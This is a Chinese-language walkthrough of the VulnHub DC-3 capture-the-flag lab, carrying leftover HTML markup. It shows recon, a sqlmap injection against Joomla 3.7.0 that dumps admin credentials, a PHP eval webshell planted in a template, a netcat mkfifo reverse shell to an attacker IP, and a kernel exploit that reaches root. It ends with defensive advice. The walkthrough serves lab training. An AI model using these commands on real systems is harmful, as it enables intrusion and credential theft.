VulnHub DC-3渗透测试完整教学文档<\/h1>

1. 环境准备<\/h2>

1.1 靶机下载与配置<\/h3>

下载链接：百度网盘(提取码d9cz)<\/li>

常见配置问题解决：

移除CD\/DVD设备<\/li>

修改网卡为NAT模式<\/li> <\/ul> <\/li> <\/ul>

1.2 网络扫描<\/h3>

arp-scan -l  # 扫描同网段主机<\/span>
<\/span><\/span>nmap -T4 -A -p 0-65535 10.10.10.4  # 深度扫描目标<\/span>
<\/span><\/span><\/code><\/pre>2. 信息收集<\/h2>
2.1 Web服务探测<\/h3>

发现开放80端口<\/li>
使用dirb扫描目录：<\/li>
<\/ul>
dirb http:\/\/10.10.10.4
<\/span><\/span><\/code><\/pre>
发现后台管理页面：\/administrator\/<\/code><\/li>
<\/ul>
2.2 CMS识别<\/h3>

识别为Joomla CMS<\/li>
使用JoomScan扫描：<\/li>
<\/ul>
joomscan -u http:\/\/10.10.10.4
<\/span><\/span><\/code><\/pre>
确认版本：Joomla 3.7.0<\/li>
<\/ul>
3. 漏洞利用<\/h2>
3.1 SQL注入漏洞<\/h3>

搜索已知漏洞：<\/li>
<\/ol>
searchsploit joomla 3.7.0
<\/span><\/span><\/code><\/pre>

发现漏洞说明文件：\/usr\/share\/exploitdb\/exploits\/php\/webapps\/42033.txt<\/code><\/p>
<\/li>

使用SQLMap进行攻击：<\/p>
<\/li>
<\/ol>
sqlmap -u "http:\/\/10.10.10.4\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre>
逐步爆破：<\/li>
<\/ol>
# 爆破数据表<\/span>
<\/span><\/span>sqlmap -u "http:\/\/10.10.10.4\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb --tables -p list[<\/span>fullordering]<\/span>
<\/span><\/span>
<\/span><\/span># 爆破字段<\/span>
<\/span><\/span>sqlmap -u "http:\/\/10.10.10.4\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb -T "#__users"<\/span> --columns -p list[<\/span>fullordering]<\/span>
<\/span><\/span>
<\/span><\/span># 爆破数据<\/span>
<\/span><\/span>sqlmap -u "http:\/\/10.10.10.4\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb -T "#__users"<\/span> -C "username,password"<\/span> --dump -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre>
获取到管理员凭据：<\/li>
<\/ol>
username: admin
password: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
<\/code><\/pre>
3.2 密码破解<\/h3>

使用John the Ripper破解哈希：<\/li>
<\/ol>
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'<\/span> > a.txt
<\/span><\/span>john a.txt
<\/span><\/span><\/code><\/pre>
获取明文密码：snoopy<\/code><\/li>
<\/ol>
4. 获取WebShell<\/h2>
4.1 后台登录<\/h3>

使用凭证登录：http:\/\/10.10.10.4\/administrator\/<\/code><\/li>
用户名：admin<\/li>
密码：snoopy<\/li>
<\/ul>
4.2 文件上传漏洞利用<\/h3>

导航路径：Extensions > Templates > Templates<\/li>
选择Beez3模板<\/li>
新建文件shell.php<\/code>并写入一句话木马：<\/li>
<\/ol>
<?<\/span>php<\/span> @<\/span>eval<\/span>($_POST[cmd<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
保存文件<\/li>
<\/ol>
4.3 连接WebShell<\/h3>

访问路径：http:\/\/10.10.10.4\/templates\/beez3\/shell.php<\/code><\/li>
使用蚁剑连接，密码：cmd<\/li>
<\/ul>
5. 权限提升<\/h2>
5.1 反弹Shell<\/h3>

攻击机开启监听：<\/li>
<\/ol>
nc64.exe -lvvp 6666<\/span>
<\/span><\/span><\/code><\/pre>
目标机执行反弹命令：<\/li>
<\/ol>
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.10.10.17 6666<\/span> >\/tmp\/f
<\/span><\/span><\/code><\/pre>
获取交互式Shell：<\/li>
<\/ol>
python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>5.2 内核漏洞提权<\/h3>

上传漏洞检测脚本：<\/li>
<\/ol>
.\/linux-exploit-suggester.sh
<\/span><\/span><\/code><\/pre>
发现CVE-2016-4557漏洞可利用<\/li>
下载并上传漏洞利用代码(百度网盘提取码3ufi)<\/li>
解压并编译：<\/li>
<\/ol>
unzip 39772.zip
<\/span><\/span>cd 39772<\/span>
<\/span><\/span>tar -vxf exploit.tar
<\/span><\/span>cd ebpf_mapfd_doubleput_exploit
<\/span><\/span>chmod 777<\/span> compile.sh doubleput.c
<\/span><\/span>.\/compile.sh
<\/span><\/span><\/code><\/pre>
成功获取root权限<\/li>
<\/ol>
6. 获取Flag<\/h2>
cd \/root
<\/span><\/span>cat flag.txt
<\/span><\/span><\/code><\/pre>Flag内容：<\/p>
V V Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
<\/code><\/pre>
关键工具总结<\/h2>

arp-scan\/nmap - 网络扫描<\/li>
dirb - 目录爆破<\/li>
joomscan - Joomla漏洞扫描<\/li>
sqlmap - SQL注入工具<\/li>
John the Ripper - 密码破解<\/li>
蚁剑 - WebShell管理<\/li>
Netcat - 网络工具<\/li>
linux-exploit-suggester.sh - 本地提权检测<\/li>
<\/ol>
防御建议<\/h2>

及时更新CMS系统<\/li>
对用户输入进行严格过滤<\/li>
限制后台文件上传类型<\/li>
定期更新操作系统内核<\/li>
使用最小权限原则配置服务<\/li>
<\/ol>

VulnHub DC-3渗透测试完整教学文档<\/h1>

1. 环境准备<\/h2>

2. 信息收集<\/h2>

3. 漏洞利用<\/h2>

4. 获取WebShell<\/h2>

5. 权限提升<\/h2>

防御建议<\/h2> 及时更新CMS系统<\/li> 对用户输入进行严格过滤<\/li> 限制后台文件上传类型<\/li> 定期更新操作系统内核<\/li> 使用最小权限原则配置服务<\/li> <\/ol>

防御建议<\/h2>

及时更新CMS系统<\/li>
对用户输入进行严格过滤<\/li>
限制后台文件上传类型<\/li>
定期更新操作系统内核<\/li>
使用最小权限原则配置服务<\/li> <\/ol>